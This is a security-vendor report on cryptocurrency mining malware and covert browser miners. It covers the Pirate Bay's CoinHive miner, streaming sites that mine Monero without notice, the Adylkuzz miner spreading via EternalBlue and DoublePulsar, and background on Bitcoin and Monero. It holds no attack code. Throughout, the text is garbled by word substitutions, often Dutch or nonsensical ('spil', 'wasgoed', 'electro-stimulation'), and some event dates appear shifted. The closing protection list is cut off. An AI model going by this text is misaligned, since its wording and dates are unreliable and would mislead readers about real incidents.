Until recently, websites that provide free services earned almost all their revenue through advertisements. Is the Pirate Bay example signaling that cryptocurrency mining may soon take overheen spil the main revenue source?
How does the rising popularity of cryptocurrency miners affect the cyber security landscape? Te which cases is it a legitimate instrument, and te which is it considered malware? Te this report, wij will reaction thesis questions.
The very first cryptocurrency that gained popularity and triggered the growth of the market and mining communities wasgoed BitCoin – the very first decentralized coin. Spil time passed and BitCoin mining gained popularity, the computational resources required te order to stay te the spel grew higher. The use of specialized hardware made it even stiffer for miners that used individual computers, be it threat actors using malware or solo miners, at a certain point, mining BitCoin and other leading cryptocurrencies such spil Ethereum became non-profitable, taking into consideration the costs of the hardware and electro-stimulation. At this point, fresh miners entered the spel – the fresh miners required far less CPU resources spil they were a loterijlot less popular and were mined by much smaller communities. Some of them, such spil Monero, attempted to outgrow BitCoin by avoiding the coin’s thickest flaw – the lack of privacy. Naturally, fresh cryptocurrencies led to fresh crypto miners – both implements for the mining community, and malware.
The Birth of Crypto Miners, and Crypto Cyber Campaigns
The rising popularity of cryptocurrency, for both purchasing and for mining, has led to a significant growth of the mining community and cryptocurrency market worldwide. Thesis ter turn have produced a fresh zuigeling of instrument used to generate revenue: Crypto Miners.
While the term ‘crypto miner’ refers to contraptions that are available online, and can be used by the mining community, devices used by malicious actors upon infection are called ‘crypto mining malware’.
Spil with any fresh technology or advancement that has potential build up te it, the birth of cryptocurrencies also became a fertile ground for financially motivated cyber actors. To avoid the costs of expensive hardware, cybercriminals infect numerous systems te order to consume the victims’ CPU or GPU power and existing resources for crypto mining. By using different attack vectors, such spil spam campaigns and Exploit Kits, they are able to turn the infected machines into troops of cryptocurrency miners.
Cryptocurrency mining is a computationally intensive task which requires powerful resources from specialized hardware and dedicated processors, and incurs significant electro-therapy costs and investments ter hardware. The BitCoin network generates a fresh block every Ten minutes, regardless of the number of active miners. This means that the entrance of fresh miners into the spel does not necessarily accelerate the mining process, but may actually slow it down, spil this increases the complexity of the mining operation.
Spil expected, the very first cryptocurrency miners were designed to mine BitCoin, and emerged te 2011, shortly after BitCoin began gaining attention and popularity. One such miner wasgoed the Otorun worm. The infamous Kelihos, one of the largest botnets which wasgoed taken down by the FBI ter April 2018, wasgoed also used for BitCoin mining. The latest development of ems of fresh cryptocurrencies has led to a multiplicity of fresh crypto miners, with each one designed to mine a specific currency. All of the crypto miners leverage their victims’ laptop resources, causing the infected machines to run abnormally slow.
Miners for the ‘Ethereum’, ‘Zcash’ and ‘Dogecoin’ currencies can presently be observed ter the wild, however some sources say that mining thesis currencies using individual computers, even if a large number of bots is involved, is no longer profitable. Without a doubt, the top currency mined by threat actors thesis days is the Monero currency (see Appendix).
Crypto miners’ growing role te the treat landscape
Let’s take another look at the Pirate Bay Monero Miner case, and review the concerning role of web-based crypto miners ter the treat landscape.
Presently, websites which do not provide paid services rely on advertisements for revenue. Many websites are loaded with ads, which strongly influence the user practice and accessibility of the actual content. Substituting the ads with a crypto miner, which uses a limited percentage of the CPU power of the webstek users, can be a good trade-off for webstek owners – it generates revenue for the owners and provides an improved and less intrusive practice for the end users.
However, the security community voorwaarde remain waakzaam te light of such developments, spil the crypto miners would have a clear rente to increase the percentage of the rekentuig resources consumed, and perhaps even leverage their access and elevate their privileges overheen the users’ machines.
The Pirate Bay case instantly made headlines and led to a stream of customer questions and complaints. An online search for similar cases yielded no results. Does this mean The Pirate Bay case is an outlier, or is it actually just one of many examples of a trend presently flying under the radar?
An investigation conducted by Check Point researchers exposes that cryptocurrency miners have knowingly bot injected into some top websites, mostly media streaming and verkeersopstopping sharing services, without notifying the users. According to our research, those miners regularly use spil much spil 65% of the end-users’ CPU power.
Example 1: Uptobox.com is a opstopping hosting service ranked 70 te France and 672 globally according to Alexa. The webstek uses its users’ CPU power to mine the Monero cryptocurrency without notification.
Example Two: Vidzi.tv is a movie sharing service ranked 659 te the US and 788 globally. The webstek uses its users’ CPU power to mine the Monero cryptocurrency without notification.
Using movie streaming websites for mining is the ultimate way to consume clients’ laptop resources while remaining under the radar. Normally, users select their preferred content and witness the movie, leaving the browser unmonitored for at least an hour. It’s effortless and convenient, and the top movie streaming websites can generate some fine revenue for the operation’s owners.
The CPU Usage of an ordinary laptop while accessing the movie streaming service WatchFree.to, ranked 1,076 ter the US and 1,625 by Alexa. The overall CPU usage of the machine while accessing the webstek is 69%.
The brains behind such an operation can be either the webstek owners themselves who want to generate revenue without resorting to copious advertisements, or threat actors who inject a code to enable the mining activity via a popular website’s user base.
uptostream.com is a movie streaming service, ranked 573 te France and 7,698 globally. This service mines the Monero currency while using its users’ laptop resources without notification.
When wij examine the integration of the cryptocurrency miner into the vidzi.tv pagina, wij can see the use of a non-official method – one that is different than the one CoinHive offers for use on their official webstek. This pagina wasgoed most likely compromised by malicious actors and wasgoed surreptitiously injected with the miner.
The injection of the CoinHive Monero miner into vitzi.tv, using a non-official method
The examples introduced above are only a few out of ems of cases observed during one week of research ter September 2018. Each of thesis examples demonstrates a different way to integrate the miner into the webstek. All of them consume a significant percentage of CPU power, yet only te some cases can the percentage and number of threads be managed by the webstek possessor. Some websites were found to be related to each other, which may imply that an organized mining operation is taking place. Te other cases, inactive domains, which according to Alexa remain very popular, were found to be mining cryptocurrency. This might mean that several other websites are silently redirecting their users to this pagina.
The Case of the Adylkuzz Monero Miner
One of the most noticeable cryptocurrency miners of 2018 is Adylkuzz, a malware which mines the Monero currency on its victims’ machines. While it may have bot active ter late April or early May, Adylkuzz notably emerged on May 15, 2018, only three days after the begin of the global spread of the WannaCry ransomware campaign. Adylkuzz shares some similarities with WannaCry. It uses the EternalBlue exploit, which wasgoed made available to the public spil part of the Shadow Brokers hacking group leak of NSA instruments, to locate vulnerable machines and spread laterally within infected networks. It also uses the DoublePulsar backdoor to install its payload. Interestingly, an Adylkuzz attack shuts down SMB networking to prevent infection with other malware. Therefore, the Adylkuzz attack may have had an effect on the WannaCry ransomware spread. The close proximity of thesis two large-scale campaigns and the publicity gained by the WannaCry ransomware may have caused the Adylkuzz attacks to be attributed to WannaCry. What wij witnessed te Adylkuzz demonstrates that cryptocurrency miners are now using similar attack vectors and enlargening their share of the cyber landscape.
An examination of the malware’s infection statistics through the Check Point ThreatCloud shows that Adylkuzz had a clear spike ter its attack rate right when it very first emerged and te parallel to the WannaCry campaign. It is still active.
Adylkuzz Malware Activity – The graph presents the Adylkuzz malware’s attack rate spil of May 15, 2018
Spil the WannaCry ransomware and Adylkuzz miner campaigns, which use similar implements and mechanisms, began at the same time, they are believed to share similar targets. The top countries attacked by WannaCry include Russia, Ukraine, India and Taiwan.
Now, let’s examine the top countries infected by Adylkuzz malware:
Spil shown above, Adylkuzz targets are spread all overheen the world, with no clear orientation to a specific region.
WannaCry had no predefined targets. The ransomware wasgoed spread to a random C-Class IP range, while seeking vulnerable public facing SMB ports against which it could leverage the EternalBlue exploit. Therefore, wij can estimate that Adylkuzz wasgoed spread te a similar way.
According to CNBC, spil of August 2018, the cryptocurrency market wasgoed worth about $141 billion. While BitCoin wasgoed the very first vooraanstaand cryptocurrency accepted by online markets and used by cybercriminals, today, ems of cryptocurrencies are widely used for both legitimate purposes, and by threat actors for non-legitimate and often fraudulent purposes.
The popularity of the various currencies among cryptocurrency miners is determined mostly based on the profitability that lies ter mining the coin. Spil the use of a digital currency rises, so does the need to mine it. This is why te latest months wij see an increase ter the number of Crypto Mining malware campaigns making headlines.
The Adylkuzz campaign’s use of EternalBlue and DoublePulsar highlights another enlargening trend: Crypto Mining malware leveraging attack instruments and vectors used by other malware and threat actors.
Spil the public is not yet fully aware of the prevalence of this fresh malware type, it is often stiffer to detect, spil wasgoed the case of Adylkuzz and WannaCry. Wij have no doubt that a fresh, silent yet significant actor, has leisurely entered the threat landscape, letting threat actors monetize while victims’ endpoints and networks suffer from latency and decreased spectacle. This fresh threat is here to stay.
Check Point NGTP and NGTX customers are protected against infection by crypto miners and against the hurting consequences of their mining activity.
To learn more about bitcoins and cryptocurrencies and understand if your cyber security may be at risk, download our guide “Cryptocurrencies: How Safe are They?”
Background for this research
Appendix 1 – BitCoin and other Cryptocurrencies
Cryptocurrency is an encrypted digital asset used spil a medium of exchange to perform secured transactions. It uses cryptography both to protect the gegevens string which represents a unit of currency, and to control the creation process of extra currency units. Cryptocurrencies are created te a process called mining, which is based on mathematical proof and on cryptographic algorithms.
Te tegenstelling to physical money, cryptocurrencies are not issued and managed by one central authority. They are decentralized – organized and managed by a peer-to-peer network called Blockchain, which verifies all transactions and serves spil the currency’s ledger.
While it wasn’t the very first everzwijn digital coin, BitCoin is the very first decentralized cryptocurrency. It wasgoed created ter 2009, with the intention to become a public currency independent of any central authority or high transaction fees. Ter July 2010, the value of a BitCoin wasgoed 6 cents. Spil of September 2018, a single BitCoin is worth $Four,950 – an increase of 8,249,900%.
BitCoin mining is the process by which transactions are verified and added to the Blockchain, and also the means through which fresh BitCoins are released. Anyone with access to the internet can participate ter mining. Presently, it takes approximately 98 years to mine a BitCoin block (25 BTC), due to the mining difficulty, that boundaries the amount of BitCoins. Therefore, there are several pools that use snaak computational resources to mine a single BitCoin block.
A BitCoin wallet is anonymized, which means it is not linked to a name, address or any individual identification. However, information about all transactions everzwijn made using BitCoin is stored ter the Blockchain and is available to the public. While the identity of the proprietor remains hidden, anyone can tell how many BitCoins are stored te a specific wallet at any given ogenblik.
While BitCoin is still the most famous cryptocurrency, fresh digital currencies are permanently created and made spil accessible to developers spil possible. Some of them, such spil ‘Litecoin’, ‘Monero’ and ‘Ethereum’, are already strenuously traded online, and hundreds of others are used by puny communities.
Digital currency is increasingly used to purchase products online, spil the purchase is made quickly, without delays or intermediate charges. Another large advantage of cryptocurrency lies te its security – the user credentials are not exposed ter the process, and thus fraud and identity theft are a lotsbestemming more difficult to carry out. Thesis qualities, meant to protect the end-user, make cryptocurrency ideal for cybercriminals – and indeed, most ransomware requests payment using BitCoins. Some of them obfuscate the transaction even further, spil observed ter the case of Cerber ransomware.
Cerber Bitcoin Flow – The transaction involves a BitCoin Mixing Service to avoid detection of the BitCoin wallets used by the author and by the ransomware’s affiliates.
Appendix Trio – The Monero cryptocurrency
Looking back at the thickest crypto mining campaigns carried out during 2018 so far, the vast majority of those involved Monero miners. Major campaigns include:
- January – A Terror Exploit Plak campaign which distributed a Monero Cryptocurrency Miner
- June – A campaign targeting Linux machines which leveraged a vulnerability te Samba installations to distribute a Monero miner dubbed ‘cpuminer’ or ‘EternalMiner’, due to the proximity to the WannaCry ransomware
- August – A campaign targeting MAC users via a cheating app vHook which distributed a Monero Miner dubbed Pwnet
The Monero cryptocurrency wasgoed created te April 2014. Ter September of that year, it wasgoed the victim of an attack which leveraged a flaw te the code of the protocol used by its cryptocurrency. The Monero cryptocurrency experienced a rapid growth ter market capitalization te 2016, when it wasgoed adopted by the AlphaBay market, formerly the largest market on the dark web. Monero has bot the subject of growing rente lately, and thus more and more Monero miners – including ‘CoinHive’, the miner used by The Pirate Bay – are now suggested for sale on online markets.
The reason for Monero’s popularity is very first of all its technology. Monero uses a protocol called ‘CryptoNote’, which is used by several other cryptocurrencies spil well, and an algorithm called ‘CryptoNight.’ This algorithm is designed to run rapid on individual computers and laptop CPUs, spil opposed to the algorithm used by many other coins, which only run well on custom-made mining chips. Additionally, a Monero block is produced approximately every two minutes and has an automatically adaptive block size limit, which means that it can treat an increase ter the transaction volume without causing a delay if a user attempts an instant transaction. A BitCoin block, ter tegenstelling, is produced approximately every ten minutes and has a maximum size. If there is no slagroom ter the block, a transaction vereiste either be delayed, or the user voorwaarde increase the transaction toverfee. Lastly, Monero is considered to be a secured and untraceable coin. Unlike BitCoin, the amount of coins stored te a Monero wallet is not accessible to the public.
Check Point customers are protected against this threat with the following IPS protection (listig):